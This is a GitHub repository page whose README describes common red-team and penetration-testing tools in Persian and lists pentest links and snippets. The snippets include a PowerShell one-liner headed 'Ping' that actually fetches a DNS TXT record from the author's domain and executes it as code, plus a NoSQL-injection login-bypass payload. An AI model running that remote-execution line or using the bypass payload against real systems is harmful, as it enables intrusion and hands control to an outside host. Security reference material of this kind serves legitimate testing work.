https://github.com/mrmtwoj/ac-bookmark
https://github.com/mrmtwoj/ac-bookmark
Last synced: 5 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/mrmtwoj/ac-bookmark
- Owner: mrmtwoj
- Created: 2022-10-08T20:21:31.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2025-03-03T15:06:57.000Z (over 1 year ago)
- Last Synced: 2025-09-26T11:43:49.662Z (9 months ago)
- Size: 40 KB
- Stars: 0
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# ابزارهای Red Teaming و تست نفوذ
این مستند شامل ابزارهایی است که تیمهای **Red Team** برای شبیهسازی حملات و شناسایی آسیبپذیریها در سیستمها، شبکهها و وبسایتها استفاده میکنند. در ادامه توضیحات، ویژگیها و نحوه استفاده از این ابزارها آمده است.
---
## 1. Metasploit Framework
### توضیحات:
Metasploit یکی از قدرتمندترین فریمورکها برای تست نفوذ و شبیهسازی حملات است. این ابزار به تیمهای Red Team کمک میکند تا از **Exploit**های موجود برای بهرهبرداری از آسیبپذیریها در سیستمها استفاده کنند.
### ویژگیها:
- شامل هزاران exploit برای آسیبپذیریهای شناختهشده
- ابزارهای کمکی مانند **payload**، **post-exploitation**، و **reporting**
- توانایی نوشتن و پیادهسازی exploitهای جدید
### استفاده:
- برای حملات **Remote Code Execution (RCE)**، **Privilege Escalation** و **Web Application Attacks** استفاده میشود.
---
## 2. Nmap
### توضیحات:
Nmap (Network Mapper) ابزاری برای اسکن و کشف شبکه است. این ابزار در جمعآوری اطلاعات اولیه از شبکه و شناسایی پورتهای باز و سرویسهای فعال بسیار مفید است.
### ویژگیها:
- شناسایی پورتهای باز و سرویسهای در حال اجرا بر روی هر IP
- تشخیص نسخه نرمافزار و سیستمعامل با استفاده از **OS Detection**
- اسکن برای آسیبپذیریها و بررسی شبکههای مجازی
### استفاده:
- برای شناسایی سرویسها، سیستمعاملها و وضعیت امنیتی سیستمهای موجود در یک شبکه استفاده میشود.
---
## 3. Burp Suite
### توضیحات:
Burp Suite ابزاری است برای تست امنیت وبسایتها که از آن برای کشف آسیبپذیریهایی مثل **XSS** (Cross-site Scripting)، **SQL Injection** و **Command Injection** استفاده میشود.
### ویژگیها:
- شبیهسازی حملات بر روی برنامههای وب
- قابلیت **intercepting** (مانند MITM)
- **Scanner** برای شناسایی آسیبپذیریهای رایج وب
- قابلیت توسعه با استفاده از پلاگینها
### استفاده:
- برای تست آسیبپذیریهای **Web Applications** و شبیهسازی حملات **Man-in-the-Middle (MITM)** و **Injection Attacks** بسیار کاربردی است.
---
## 4. Cobalt Strike
### توضیحات:
Cobalt Strike یک ابزار شبیهسازی حمله بسیار پیشرفته است که بهطور خاص برای **Red Teaming** طراحی شده است. این ابزار از قابلیتهای متعددی برای حملات **post-exploitation**، **lateral movement** و **pivoting** برخوردار است.
### ویژگیها:
- توانایی تست نفوذ و شبیهسازی حملات پیشرفته
- ارائه **beacons** برای برقراری ارتباط با سیستمهای تحت نفوذ
- **Remote Access** و **Privilege Escalation**
- امکانات گسترده برای **social engineering**
### استفاده:
- برای حملات پیچیده مانند **spear-phishing**، **webshell** و **backdoor access** به سیستمها استفاده میشود.
---
## 5. Wireshark
### توضیحات:
Wireshark یک **sniffer** شبکه است که به تیمهای Red Team کمک میکند تا بستههای شبکه را ضبط کرده و تجزیه و تحلیل کنند. این ابزار میتواند به شبیهسازی حملات مانند **Man-in-the-Middle (MITM)** و **sniffing passwords** کمک کند.
### ویژگیها:
- ضبط بستهها از شبکه
- تجزیه و تحلیل پروتکلهای مختلف
- بررسی **TCP/IP** و دیگر پروتکلهای شبکه
- تجزیه و تحلیل حملات **MITM**
### استفاده:
- برای شبیهسازی حملات **sniffing** و بررسی ترافیک شبکه و کشف اطلاعات حساس مانند **passwords**، **cookies** و **session tokens** استفاده میشود.
---
## 6. Nessus
### توضیحات:
Nessus یک اسکنر آسیبپذیری است که میتواند به سرعت سیستمها و شبکهها را اسکن کرده و آسیبپذیریهای شناختهشده را شناسایی کند. این ابزار در **pre-attack phase** بسیار مفید است.
### ویژگیها:
- اسکن آسیبپذیریهای عمومی و پیکربندی ضعیف
- پایگاه داده **CVE** (Common Vulnerabilities and Exposures) برای شناسایی آسیبپذیریها
- مستندسازی آسیبپذیریها و ارائه راهکار
### استفاده:
- برای انجام **vulnerability scanning** و شناسایی آسیبپذیریهای موجود در نرمافزارها و سیستمهای تحت تست استفاده میشود.
---
## 7. BloodHound
### توضیحات:
BloodHound ابزاری برای شبیهسازی حملات **Active Directory** است. این ابزار به تیمهای Red کمک میکند تا جهت حرکت جانبی (**Lateral Movement**) و **Privilege Escalation** را شبیهسازی کنند.
### ویژگیها:
- شبیهسازی حملات به **Active Directory** و **permission escalation**
- قابلیت **mapping** ساختار **Active Directory**
- شناسایی و سوءاستفاده از **misconfigurations** در **Active Directory**
### استفاده:
- برای شبیهسازی حملات داخلی به **Windows Active Directory** و شناسایی مسیرهای حمله برای **privilege escalation** استفاده میشود.
---
## 8. John the Ripper
### توضیحات:
John the Ripper یکی از مشهورترین ابزارهای کرک پسورد است که برای شبیهسازی حملات **Brute Force** و **Dictionary Attack** استفاده میشود.
### ویژگیها:
- کرک کردن پسوردهای مختلف با استفاده از حملات **Brute Force** و **Dictionary**
- پشتیبانی از انواع الگوریتمهای هش مانند **MD5**، **SHA**، **LM** و **NTLM**
- قابلیت **distributed cracking** برای کرک پسوردها بهصورت موازی
### استفاده:
- برای شبیهسازی حملات به پسوردهای کاربران در سیستمها و شبکههای مختلف استفاده میشود.
---
## 9. Hydra
### توضیحات:
Hydra یک ابزار **brute force** برای حملات به سرویسهای مختلف مانند **SSH**، **FTP**، **HTTP**، **RDP** و غیره است.
### ویژگیها:
- قابلیت اجرای attacks بر روی بیش از 50 پروتکل مختلف
- پشتیبانی از **dictionary attacks** و **brute-force** حملات
- امکان تعیین تعداد تلاشها و تنظیمات سفارشی
### استفاده:
- از Hydra برای انجام حملات **brute-force** به سیستمها و سرویسهای مختلف برای کشف رمز عبورهای ضعیف استفاده میشود.
---
## 10. Social-Engineer Toolkit (SET)
### توضیحات:
SET یک ابزار فوقالعاده برای **مهندسی اجتماعی** است که به تیمهای Red کمک میکند حملات **فیشینگ** و **مهندسی اجتماعی** را شبیهسازی کنند.
### ویژگیها:
- پشتیبانی از حملات **phishing** و **spear-phishing**
- قابلیت ساخت **payload**های فیشینگ
- ابزارهای پیشرفته برای مهاجمتان به هدفها با استفاده از تکنیکهای مهندسی اجتماعی
### استفاده:
- از SET برای شبیهسازی حملات مهندسی اجتماعی مانند **فیشینگ**، ایجاد صفحات تقلبی و بهرهبرداری از خطای انسانی استفاده میشود.
---
## 11. Fuff (Fuzzing و Discovery Tool)
### توضیحات:
Fuff یکی از ابزارهای محبوب در دنیای امنیت است که به ویژه برای **Directory Bruteforce** و **Fuzzing** در **Web Applications** طراحی شده است. این ابزار برای شبیهسازی حملات بر روی URLها و مسیرهای URL استفاده میشود.
### ویژگیها:
- پشتیبانی از پروتکل **HTTP/HTTPS**
- عملکرد سریع و کارآمد
- پشتیبانی از **wordlist**های بزرگ
- پشتیبانی از فیلترهای پیشرفته
- پشتیبانی از **DNS** و **TCP**
### استفادهها:
- برای **bruteforce** کردن مسیرها و دایرکتوریها در یک وبسایت
- شبیهسازی حملات **fuzzing** برای یافتن نقاط آسیبپذیر
- شبیهسازی حملات **path traversal** برای پیدا کردن فایلهای حساس
---
## 12. ابزارهای Fuzzing
Fuzzing یک تکنیک تست امنیت است که برای یافتن آسیبپذیریها در نرمافزارها و سیستمها استفاده میشود. این ابزارها با ارسال ورودیهای تصادفی و نادرست به سیستم، نقاط ضعف و رفتارهای غیرمنتظره سیستم را شبیهسازی میکنند.
### ابزارهای محبوب Fuzzing:
- **AFL (American Fuzzy Lop)**: به طور خودکار ورودیهای تصادفی تولید میکند.
- **Burp Suite Intruder**: برای شبیهسازی حملات **SQL Injection**، **XSS**، **Command Injection** و دیگر آسیبپذیریهای وب.
- **Peach Fuzzer**: برای تست آسیبپذیریهای پروتکلها و پروژههای نرمافزاری.
- **OWASP ZAP**: ابزار fuzzer برای **web applications**.
---
## 13. ابزارهای Deep Scanning (اسکن عمیق)
ابزارهای **deep scanning** بیشتر به شبیهسازی حملات پیچیدهتر و شناسایی آسیبپذیریهای پنهان در سیستمها و وبسایتها کمک میکنند.
### ابزارهای Deep Scanning:
- **Nikto**: اسکنر وب برای شناسایی آسیبپذیریهای رایج.
- **Dirbuster**: ابزار brute-forcing برای دایرکتوریها و مسیرهای وب.
- **Amass**: ابزار OSINT برای کشف زیرساختهای شبکه و میزبانها.
---
با این ساختار میتوانید راحتتر ابزارها و روشهای مورد استفاده در تیمهای Red Team را مدیریت و پیادهسازی کنید.
# ac-bookmark
Free Tools and Source For Security Pentest .. 😎
```sh
https://github.com/jpillora/chisel
https://github.com/samratashok/nishang
https://github.com/411Hall/JAWS
https://github.com/unicorn-engine/unicorn
https://github.com/ropnop/kerbrute
https://github.com/swisskyrepo/PayloadsAllTheThings
https://github.com/cyberheartmi9/Frida-Guide/blob/main/Frida%20Guide/Frida%20Guide.md
https://www.r57shell.net
https://wiki.96.mk/
https://ninite.com/
https://vulners.com
https://crt.sh
https://grep.app
https://github.com/Live-Hack-CVE
https://search.censys.io/
https://crt.sh/json?q=domainname
https://vulmon.com/
https://www.tarlogic.com/blog/
https://www.blazeinfosec.com/
https://www.ired.team/
https://github.com/decalage2
```
### Command FUZZIng Check extension in request
```sh
ffuf -request 'file.req' -request-proto hhtp or https -w 'List extensions fuzzing' -ms 'size header+body'
```
### Ping
```sh
powershell . (nslookup -q=txt mrmtwoj.ir)[-1]
```
### BYPass Sql inkect and json
```sh
{"username":"admin","password":{"$ne":""}}
```
```python
Scaling Network Scanning
https://github.com/natlas/natlas
https://alternativeto.net/software/natlas/about/
```
### RED TEAM IK
theHarvester is a simple to use, yet powerful tool designed to be used during the reconnaissance stage of a red
team assessment or penetration test. It performs open source intelligence (OSINT) gathering to help determine
a domain's external threat landscape. The tool gathers names, emails, IPs, subdomains, and URLs by using
multiple public resources that include:
```sh
https://github.com/laramies/theHarvester
```
Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS.
```sh
https://github.com/aboul3la/Sublist3r
```
Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open source web-based reconnaissance quickly and thoroughly.
```sh
https://github.com/lanmaster53/recon-ng
```
SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.
```sh
https://github.com/smicallef/spiderfoot
```
The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.
```sh
https://github.com/owasp-amass/amass
```